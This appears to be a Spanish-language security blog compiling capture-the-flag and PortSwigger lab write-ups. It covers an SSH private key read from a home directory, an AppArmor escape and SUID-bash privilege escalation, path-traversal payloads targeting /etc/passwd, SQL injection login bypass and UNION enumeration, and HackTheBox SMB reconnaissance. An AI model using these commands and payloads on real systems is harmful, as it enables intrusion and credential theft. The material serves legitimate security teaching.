-rw-r--r-- 1 think    think    3771 Nov 14  2023 .bashrc
drwx------ 2 think    think    4096 Nov 14  2023 .cache
drwx------ 3 think    think    4096 Dec  8  2023 .config
drwx------ 3 think    think    4096 Feb 10  2024 .gnupg
drwxrwxr-x 3 think    think    4096 Jan 10  2024 .local
-rw-r--r-- 1 think    think     807 Nov 14  2023 .profile
lrwxrwxrwx 1 think    think       9 Feb 10  2024 .python_history -> /dev/null
drwxr-xr-x 2 think    think    4096 Jan 10  2024 .ssh
lrwxrwxrwx 1 think    think       9 Feb 10  2024 .viminfo -> /dev/null
drwxr-x--- 5 www-data www-data 4096 Dec 20  2023 spip
-rw-r--r-- 1 root     root       35 Feb 10  2024 user.txt

Y efectivamente, parece que tenemos permisos para poder entrar al directorio ".ssh" donde se almacena las pares de claves.

$ www-data@41c976e507f8:/home/think$ cd .ssh
$ www-data@41c976e507f8:/home/think$ ls

authorized_keys
id_rsa
id_rsa.pub

$ www-data@41c976e507f8:/home/think$ cat id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

Y ahí tenemos el id_rsa del usuario think, vamos a crearlo en nuestro sistema e intentar conectarnos por ssh.

$ home/dh89/Desktop/hackmyvm/Publisher/content$ touch id_rsa
(pegamos el contenido del id_rsa en ese archivo creado)
$ home/dh89/Desktop/hackmyvm/Publisher/content$ chmod 600 id_rsa
$ home/dh89/Desktop/hackmyvm/Publisher/content$ ssh think@192.168.0.20 -i id_rsa
think@publisher:~$ whoami
think
think@publisher:~$

Y logramos migrar al usuario think, ahora nos toca convertirnos en el usuario root.

Enumerando el sistema me encuentro con un binario que tiene el permiso suid en "/usr/sbin".

think@publisher:/usr/sbin$ ls -la run_container 
-rwsr-sr-x 1 root root 16760 Nov 14  2023 run_container

Investigando me encuentro que tira de otro archivo ubicado en '/opt'.

think@publisher:/usr/sbin$ ls -la /opt/run_container.sh
-rwxrwxrwx 1 root root 1715 Aug 13 19:34 /opt/run_container.sh

Ejecutándolo nos muestra lo siguiente.

think@publisher:/usr/sbin$ /opt/run_container.sh
Enter the ID of the container or leave blank to create a new one: (le doy enter)
OPTIONS:
1) Start Container
2) Stop Container
3) Restart Container
4) Create Container
5) Quit
Choose an action for a container:

Pero veo que no tenemos los permisos, que deberíamos.

Investigando enumerando la máquina me encuentro que frente a un programa que nos restringe las funcionas a algunos programas AppArmor -> (link más info)

Para revisar si está activo tenemos una ruta en el sistema.

$ think@publisher:/usr/sbin$ cat /sys/module/apparmor/parameters/enabled
Y

Nos devuelve un "Y" por tanto, parece que está activo, si hacemos un echo de $SHELL nos muestra que estamos en una bash. Más no así si lo hacemos desde un echo $0.

$ think@publisher:/usr/sbin$ echo $SHELL
bash
$ think@publisher:/usr/sbin$ echo $0
-ash

Por tanto, eso me hace pensar que estamos restringidos, podemos intentar ejecutarnos una "/bin/bash" de formas alternativas para ver si funciona.

Probando me encontré que ejecutándolo a través de sus librerías podemos escapar del programa.

$ think@publisher:/usr/sbin$ /lib64/ld-linux-x86-64.so.2 /bin/bash
$ think@publisher:/usr/sbin$ echo $0
/bin/bash

En este punto, analizando nuevamente las posibilidades. Me encontré que ya podía editar el archivo "/opt/run_container.sh" que antes no podía y como el programa "/usr/sbin/run_container" apunta a ese archivo, solo hay que agregar la línea "chmod u+s /bin/bash" al "run_container.sh" y ejecutar el "run_container".

$ think@publisher:/usr/sbin$ echo "chmod u+s /bin/bash" >> /opt/run_container.sh
$ think@publisher:/usr/sbin$ think@publisher:/usr/sbin$ run_container

List of Docker containers:
ID: 41c976e507f8 | Name: jovial_hertz | Status: Up 6 hours

Enter the ID of the container or leave blank to create a new one: (simplemente le di enter)
/opt/run_container.sh: line 16: validate_container_id: command not found

OPTIONS:
1) Start Container
2) Stop Container
3) Restart Container
4) Create Container
5) Quit
Choose an action for a container: 5
Exiting...

$ think@publisher:/usr/sbin$ ls -la /bin/bash
-rwsr-xr-x 1 root root 1183448 Apr 18  2022 /bin/bash
$ think@publisher:/usr/sbin$ bash -p
$ bash-5.0# whoami
root
$ bash-5.0#

Y así logramos convertirnos en el usuario root.

Conclusiones

Máquina bastante interesante, donde explotamos un spip para poder inyectar un comando y luego salir de un contexto restringido de la aplicación AppArmor. Ya saben cualquier consulta o duda, pueden contactarme o utilizar la sesión de comentarios.

Laboratorio 3

En este tercer laboratorio vamos a seguir aprendiendo sobre Path-Traversal continuando los laboratorios de Portswigger.

Resolución

Vemos una página web la cual vende varios artículos, como observamos el Path Traversal se ocasiona a la hora de mostrar la una imagen, por tanto, vamos a elegir una imagen y abrirla en otra ventana e interceptarlo con Burpsuite

Ahí vemos como se efectúa la petición, vamos a enviarlo al repetear para poder realizar las pruebas de Path Travesal

Como se puede observar, a la hora de intentar realizar el Path Traversal nos dice que el archivo no existe con un error de "400 Bad Request", incluso intentando listarlo desde la ruta absoluta no funciona.

Como nos indican en el banner del laboratorio, en esta ocasión la aplicación elimina los intentos de Path Traversal de forma recursiva "../../../../". Esto es una medida de prevención para que el Path Traversal no ocurra, pero si no está bien implementado lo podemos burlar.

Supongamos que la aplicación borra "../" entonces cada vez que intentemos ir hacia atrás en directorios, no funcionara el problema de esto es solo eliminarlo por una única vez.

Para que entiendan con un ejemplo "....//" si yo coloco lo mismo que antes, pero lo pongo duplicado, es decir, con "4" puntos y dos barras. A la hora de eliminarme el Path Traversal, como solo lo está eliminando una vez debido a que yo coloque duplicado, pasaría a quedar de la siguiente forma "....//" -> "../"

Pudiendo eludir esta seguridad y logrando ejecutar igualmente el Path Traversal.

Volviendo a la página, ya nos dan por finalizado el laboratorio.

Conclusiones

En este tercer laboratorio vimos como poder eludir que nos eliminen el Path Traversal, y lograr efectuarlo de igual forma. Cualquier duda o consulta pueden contactarme o comentarlo en la zona de comentarios.

Laboratorio 2

En este segundo laboratorio vamos a seguir con Path-Traversal, siguiendo con los laboratorios de Portswigger.

Resolución

Vemos la página web, la cual parece ser una tienda donde se encuentran varios artículos. Como vemos en el banner del laboratorio, el Path Traversal se ocasiona en a la hora de mostrar las imágenes.

Por tanto, vamos a interceptar la petición con Burpsuite y vamos a realizar algunas pruebas.

Elegimos una imagen y lo abrimos en una nueva ventana, luego al interceptar la petición lo enviamos al Repetear del propio Burpsuite para realizar las pruebas.

Vemos como al intentar realizar el Path Traversal, nos dice que el archivo no existe. En el banner del laboratorio encontramos que la aplicacion bloquea los Path Traversal.

Hay diversas formas de intentar eludir este bloqueo, una de ellas es colocar directamente "/etc/passwd".

Esto lo que hace es buscarlo por su ruta absoluta, en lugar de retroceder algunos directorios y especificar la ruta a la que queremos apuntar "../../../../etc/passwd".

En este caso vemos como nos representa el contenido del archivo al cual hacemos referencia con su ruta absoluta.

Si volvemos al laboratorio, nos lo dan como finalizado.

Conclusiones

En este segundo laboratorio, vimos una de las variaciones del Path-Traversal. Con esto logramos evadir un bloqueo de la aplicación y poder burlarlo.

Seguiremos en viendo otros métodos en futuros laboratorios, cualquier duda pueden contactarme o escribir en los comentarios.

Laboratorio 1

En este primer laboratorio vamos a conocer como funciona el Path Traversal con un ejemplo más práctico y desarrollándolo a lo largo de los demás laboratorios que nos ofrece Portswigger

Resolución

Vemos una página similar al resto de los otros laboratorios, un listado de imágenes de lo que parece ser una tienda online. Como se pudo observar en la descripción del laboratorio, la vulnerabilidad se encuentra en la zona donde se muestran las imágenes, así que vamos a echarle un vistazo

La página muestra las imágenes por medio de un identificador. Esto es algo común en las páginas webs, el problema viene cuando la página no está bien sanitizada y se confía en el input del usuario.

Como se puede observar en la url, el identificador de la imagen es '42' y es un '.jpg' esto no tiene mucha importancia. Las imágenes y recursos de una página tienen que almacenarse en un lugar, esto quiere decir que el '?filename=42.jpg' lo que hace es apuntar a la imagen para devolver el archivo, para efectuar un Path Traversal lo que hacemos es introducir un "../../../../" en la zona donde se apunte a un archivo almacenado en alguna ruta del sistema.

Lo que significa él "../../../" es retroceder unos directorios hacia atrás, esto lo hacemos para poder apuntar a archivos que normalmente no deberíamos poder ver, la cantidad de"../" varía, lo ideal es ir probando hasta que veamos que funciona y se ocasione el Path Traversal. Al final agregamos el archivo que estemos buscando en este caso "../../../../../../etc/passwd"

En este caso el laboratorio está configurado para resolverlo por medio de Burpsite, por tanto, lo abrimos e interceptamos la petición

Ahí lo tenemos, vamos a darle clic derecho y enviar al repeater o con Ctrl + R

Listo, lo que vamos a hacer es cambiar donde pone '42.jpg' y colocar nuestro Path Traversal para apuntar al '/etc/passwd'

Como verán, logramos retroceder algunos directorios hasta llegar a la raíz y poder apuntar hacia el archivo 'passwd'

Hecho esto, si regresamos a la página nos dan como finalizado el laboratorio

Conclusiones

Con esto damos por finalizado el primer laboratorio de Path Traversal de Burpsuite, ya sabéis cualquier duda o consulta, me pueden escribir en los comentarios o contactarme.

Introduccion

En esta sección vamos a realizar laboratorios sobre Path-Traversal, mayormente laboratorios de Portswigger. Pese a que no se encuentra en el top OWASP, es bastante común e importante tenerlo en mente a la hora de realizar nuestras pruebas

Vector de Ataque

Normalmente, este tipo de vulnerabilidad ocurre por no segurizar de forma correcta un campo o confiar en el input del usuario.

Esto nos va a permitir listar archivos, directorios, etc. Información que de normal no deberíamos tener acceso

Conclusión

Por tanto, vamos a ir viendo paso a paso el ataque y como vulnerarlo en los futuros laboratorios. Vamos a necesitar la ayuda de Burpsuite en algunos laboratorios

Laboratorio 5

En este laboratorio vamos a empezar a listar información de una base de datos. Esto es útil porque puede haber credenciales, información confidencial, etc. Que nos puede ayudar en un panel de login o para recopilar información, entre otras cosas

Resolución

Como siempre, vamos a revisar como se ve la web para empezar con el laboratorio

Vemos la página que vemos siempre, vamos a pasarlo a burpsuite para analizar la web

Vamos a utilizar la query order by para ver el número de columnas y luego poder listar más información

Observamos que tiene 2 columnas, por tanto, vamos a realizar un union attack teniendo esto en cuenta

Vamos a listar información utilizando esos dos campos que tenemos, primero antes que nada tenemos que listar todas las bases de datos del SQL, en este caso yo voy a utilizar la siguiente query para realizar esto

Como se puede ver, la tabla information_schema, donde listando information_schema.schemata podemos ver todas las bases de datos. Esto nos va a resultar útil, ya que en algunos casos simplemente mirando el nombre. Podemos determinar si puede ser relevante o no. Aunque siempre es importante enumerar todo.

Vemos una base de datos de nombre public vamos a enumerar sus tablas, esto se puede realizar con la siguiente query

Obs: Esta es una query para enumerar las tablas en una base de datos, simplemente seria adecuar el nombre de la base de datos

Vemos una tabla llamada users_jqdrtm, vamos a listar sus columnas

Obs: Una query para enumerar las columnas de una tabla dada, simplemente adecuar el nombre de la base de datos y el nombre de la tabla

Ahora solo nos queda enumerar los datos de esas columnas "username_xhdpez, password_tmlywp"

Obs: En este caso, se utiliza los dos campos NULL,NULL para representar los datos. Si cambio el nombre de las columnas. Me dieron tiempo fuera y tuve que realizar de nuevo el lab, pero la idea es la misma

Vemos las credenciales del usuario administrator, vamos a comprobar si son correctas

Obs: El usuario es "Administrator" con la primera letra en mayuscula

Conclusión

En este laboratorio revisamos como funcionan las querys para poder extraer datos, en este caso las credenciales del usuario Administrator para luego loguearnos en el panel de sección, cualquier consulta tienen la sección de comentarios

Laboratorio 4

En este laboratorio vamos a realizar una SQL Injection tipo Microsoft donde las querys que vamos a utilizar cambian. Pero el vector de ataque es prácticamente el mismo

Resolución

Vemos la web, observamos que son un grupo de artículos que podemos filtrar por categorías, vamos a pasarlo por burpsuite para analizarlo

Vamos a intentar un Union attack, pero antes vamos a utilizar la query order by para dar con la cantidad de columnas

Tiene dos columnas, por tanto, vamos a realizar el Union attack teniendo esto en cuenta

Obs: Como es MSQL (Microsoft SQL), no hay necesidad de mencionar una tabla, como lo hemos hecho en Oracle SQL

En este punto solo nos queda usar uno de los dos campos para representar la versión, les vuelvo a pasar la página donde pueden ver los tipos de query dependiendo del tipo y la versión (Link de la guía -> Portswigger-guía)

Conclusión

Con esto damos por terminado el 4 laboratorio, como siempre, cualquier duda o consulta tienen la sección de comentarios

Laboratorio 3

En este laboratorio, vamos a ver varios temas interesantes. Primero que nada vamos a conocer sobre la estructura de una query, también vamos a ver que existen varios tipos de SQL, en este caso Oracle y para finalizar un UNION attack

Query SQL

Vamos a realizar un inciso antes de continuar con el laboratorio. Es importante conocer como funciona una query SQL(Structured Query Language)

Una query puede contar con 4 campos relevantes que serían "Base de datos, Tablas, Columnas y datos"

Esto quiere decir que a la hora de extraer información, necesitamos conocer estos campos. Más adelante (en laboratorios futuros) vamos a conocer querys para poder extraer esta información

Resolución

En este laboratorio cambia un poco la página, pero la función es la misma. Algunos artículos que podemos filtrar por categorías nada raro.

Vamos a pasarlo por burpsuite para analizarlo con detenimiento

Antes de empezar necesitamos conocer los distintos tipos de SQL, porque la query cambia dependiendo de esto. Les dejo un link donde pueden ver las distintas querys dependiendo del tipo de SQL (Link de la guia -> portsiwger-sql)

En este caso vamos a efectuar un UNION attack, este tipo de ataque lo que buscar es acertar en la cantidad de columnas en una tabla. El problema con esto es que cuando la web es vulnerable a este ataque, suele mostrar campos que luego podemos aprovechar, para luego nosotros representar en esos campos para representar datos

En este caso la web es vulnerable de nuevo en el filtrado, por tanto, necesitamos saber las columnas. Aunque desconozcamos esto, podemos realizar fuerza bruta, ya que la web suele representar campos cuando acertamos con la cantidad exacta de columnas(no siempre suele representar estos campos en la web, esto lo veremos en futuros laboratorios)

En este caso podemos usar otra query, para poder dar con el número de columnas, podemos hacer un "order by". Esto lo que ocasiona es un ordenamiento por el número de columnas que ingresemos

Cómo se puede observar, no existe la columna número 100, si vamos reduciendo el número gradualmente, vamos a dar con el número de columnas

Ahora podemos realizar el unión attack, pero en las SQL que son tipo Oracle. Hay que mencionar una tabla, de lo contrario nos dará un error. Una tabla típica suele ser dual

Ahora solo queda utilizar un campo NULL para representar la versión y terminaríamos el laboratorio, para representar la versión en Oracle pueden mirar la guía que les compartí

Conclusión

Damos como finalizado este 3 laboratorio, ya saben que cualquier duda tienen la sección de comentarios

Laboratorio 2

Vamos a seguir con esta serie, realizando el segundo laboratorio. Donde esta vez vamos a lograr un bypass sobre un panel de autenticación como el usuario administrator

Resolución

Tenemos la misma página que el laboratorio anterior, pero esta vez la vulnerabilidad se encuentra en el panel de inicio de sección. Si le damos click en My account nos lleva al panel

En este caso, nos pide un username y su Password. En la imagen no nos muestra como es la query se está utilizando para validar estas credenciales, pero seguro es algo así

SELECT 'username' from user WHERE  password = 'password'

En este caso nuestro 'username' es Administrator, pero no sabemos su password, en este caso podemos abusar de esta query. Introduciendo como 'username', "Administrator' -- -"

SELECT 'Administrator'-- -' from user WHERE  password = 'password'

Como se puede apreciar, esto va a comentar toda la query que sigue. Esto o que va a acontecer es que no realice la validación de password. Y lograremos ingresar como el usuario Administrator, sin ingresar su password

Obs: Se a ingresado una password cualquiera ya que la pagina la requeria, pero no importa cual ingrese. El ataque se acontese de igual manera

Y como se puede apreciar, nos aparece un Log out y también "Your username is: administrator". Por tanto, logramos ingresar como Administrator sin ingresar su password

Conclusión

Logramos realizar un bypass de un panel de autenticación, un ejemplo importante para tener una idea de cuando probar una SQL Injection uno tiene que probar de todo. Ya saben cualquier duda, tienen los comentarios

Laboratorio 1

En este caso vamos a ver el primer laboratorio de SQL Injection de la página de portswiger, en este caso vamos a poder utilizar una query especialmente diseñada. Para poder ver más información de lo habitual

Resolución

En este caso, la página tiene un listado de imágenes, como una tienda online. Donde podemos comprar una variedad de cosas. Como observamos en la descripción del laboratorio. Este tiene la vulnerabilidad en el filtrado por categorías vamos a revisarlo

En este caso, se aplica un filtrado por la categoría Accessories y solo vemos 3 artículos, vamos a interceptar esto con burpsuite para poder analizarlo

Obs:No es necesario utilizar Burpsuite en este laboratorio, pero para explicarlo mas facil lo vamos a utilizar

Vemos como se realiza el filtrado, en este caso el laboratorio nos muestra que la query que se está utilizando es algo así:

SELECT * FROM products WHERE category = 'Gifts' AND released = 1

Donde Gifts sería la categoría en cuestión, en nuestro caso Accesories. Nos podemos aprovechar de esto de la siguiente manera, nuestro input va en el lugar de Gifts. Entonces sí, ponemos una comilla simple ', luego de la categoría. La query queda algo así

SELECT * FROM products WHERE category = 'Accesories'' AND released = 1

Esto provoca un error, debido a que queda una comilla simple suelta. En estos casos se suele comentar el resto de la query para que no mar que ningún error, para comentar en SQL se utiliza "-- -" o "--" (Existen otras formas, pero vamos a utilizar estar por el momento)

SELECT * FROM products WHERE category = 'Accesories'-- -' AND released = 1

Esto quiere decir que luego del "-- -" no se va a interpretar nada y esto causa lo siguiente

Obs:El "+" es el espacio pero ulrencodeado, puedes selecciona todo el texto y darle click derecho y urlencodear o utlizar la combinacion de teclas ctrl + u

Esta sería la primera parte, la segunda parte sería la de representar más datos de lo normal. Para esto agregamos a nuestra query lo siguiente "Accesorioes' or 1=1-- -". Como se puede observar agregamos un "or 1=1" antes de comentar la query, esto lo único que hace es dar un valor "TRUE" o verdadero. En resumen, nuestra query dice que, filtre por la categoría Accesories o 1=1 como esto último es verdadero, nos va a representar toda la información, ignorando las categorías y el filtro de "released = 1". La query final sería la siguiente

SELECT * FROM products WHERE category = 'Accesories'or 1=1-- -' AND released = 1

Colocamos esto en la página y vemos los resultados

Obs: Ahora pongo la query en la pagina para que se observe mejor la diferencia, pero no tiene niguna diferencia si lo realizamos dede burpsuite

Como se puede observar, nos muestra más resultados incluso que antes, también nos sale un eslogan de "Laboratorio resuelto"

Conclusión

Esto sería el final del primer laboratorio de portswigger sobre SQL Injection, cualquier consulta sobre como utilizar burpsuite o como acceder a los laboratorios, los pueden poner en los comentarios

Introducción

En esta sección vamos a ver que es una SQL Injection y los tipos que existen, vamos a realizar los laboratorios que se encuentran en portswigger. Esta página se centra en el OWASP, vamos a ir por cada sección explicando cada vector de ataque. Para esto vamos a utilizar la herramienta Burpsuite.

Vector de ataque

Normalmente, este tipo de ataque ocurre cuando se confía en el input del usuario, esto permite que podamos cargar ciertas querys especialmente diseñadas para poder tener acceso a información que normalmente no podríamos tenerlo, manipular archivos, eludir paneles de autenticación, etc. Entre otros casos.

Conclusión

Por tanto, es importante conocer este ataque y como emplearlo. También como utilizar burpsuite. En ciertas clases vamos a necesitar crear algunos scripts para poder automatizar ciertos ataques. Normalmente, esto se hace en python/bash.

Skills

- Smb enumeration

- Gpp-decrypt - AES key windows

- Kerberoasting attack - user Administrator

- Psexec - Connect as user Administrator

Reconocimiento

Vamos a realizar la maquina Active de hackthebox. Por tanto vamos a crear los directorios para organizar la información

$ mkdir Active-10.10.10.100
$ cd Active-10.10.10.100
$ mkdir nmap exploit content

Luego vamos a realizar un escaneo con nmap para ver que puertos estan abiertos en la maquina victima

$ namp -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.100 -oG allPorts

Yo lo exporto en formato grepeable por que tengo una función llamada extractPorts -> (link de la utilidad de extractPorts creada por s4vitar, instalar xclip)

$ extractPorts allPorts

[*] Extracting information...

    [*] IP Address: 10.10.10.100
    [*] Open ports: 53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49171,49172

[*] Ports copied to clipboard

Vemos varios puertos, vamos a realizar un escaneo mas minucioso sobre estos puertos

$ nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49171,49172 10.10.10.100 -oN targeted

# Nmap 7.93 scan initiated  as: nmap -sCV -p53,88,135,139,389,445,464,593,636,3268,3269,5722,9389,47001,49152,49153,49154,49155,49157,49158,49165,49171,49172 -oN targeted 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.18s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-08-09 09:59:28Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5722/tcp  open  msrpc         Microsoft Windows RPC
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
49171/tcp open  msrpc         Microsoft Windows RPC
49172/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 4h00m08s
| smb2-security-mode: 
|   210: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-08-09T10:00:27
|_  start_date: 2023-08-09T05:36:33

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Vamos a empezar lanzando un crackmapexec para realizar un escaneo por smb/445

$ crackmapexec smb 10.10.10.100

SMB         10.10.10.100    445    DC               [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)

Vemos un dominio active.htb, vamos agregarlo al "/etc/hosts".

$ cat /etc/hosts

# Host addresses
127.0.0.1  localhost
127.0.1.1  parrot
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
# Others

10.10.10.100 active.htb

Vamos a ver si hay archivos compartidos por el servicio smb

$ smbmap -H 10.10.10.100

[+] IP: 10.10.10.100:445    Name: active.htb                                        
    Disk                                                      Permissions    Comment
    ----                                                      -----------    -------
    ADMIN$                                                NO ACCESS    Remote Admin
    C$                                                    NO ACCESS    Default share
    IPC$                                                  NO ACCESS    Remote IPC
    NETLOGON                                              NO ACCESS    Logon server share 
    Replication                                           READ ONLY    
    SYSVOL                                                NO ACCESS    Logon server share 
    Users                                                 NO ACCESS

Tenemos permisos de lectura sobre Replication, vamos a revisar que tiene de contenido

$ smbmap -H 10.10.10.100 -r Replication

[+] IP: 10.10.10.100:445    Name: active.htb                                        
    Disk                                                      Permissions    Comment
    ----                                                      -----------    -------
    Replication                                           READ ONLY    
    .\Replication\*
    dr--r--r--                0 Sat Jul 21 06:37:44 2018    .
    dr--r--r--                0 Sat Jul 21 06:37:44 2018    ..
    dr--r--r--                0 Sat Jul 21 06:37:44 2018    active.htb

Vemos un directorio active.htb, para ir descargando las cosas uno por uno. Vamos a descargarnos todo de forma recursiva.(obs: simplemente dar al enter cuando pide la contraseña)

$ smbclient //10.10.10.100/Replication
Password for [WORKGROUP\dh89]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0,0 KiloBytes/sec) (average 0,0 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as active.htb/Policies/{6AC1786C-016F-11D2-945F-00C04fB984F9}/GPT.INI (0,0 KiloBytes/sec) (average 0,0 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Group Policy/GPE.INI (0,1 KiloBytes/sec) (average 0,1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Registry.pol (1,9 KiloBytes/sec) (average 0,6 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml (0,4 KiloBytes/sec) (average 0,6 KiloBytes/sec)
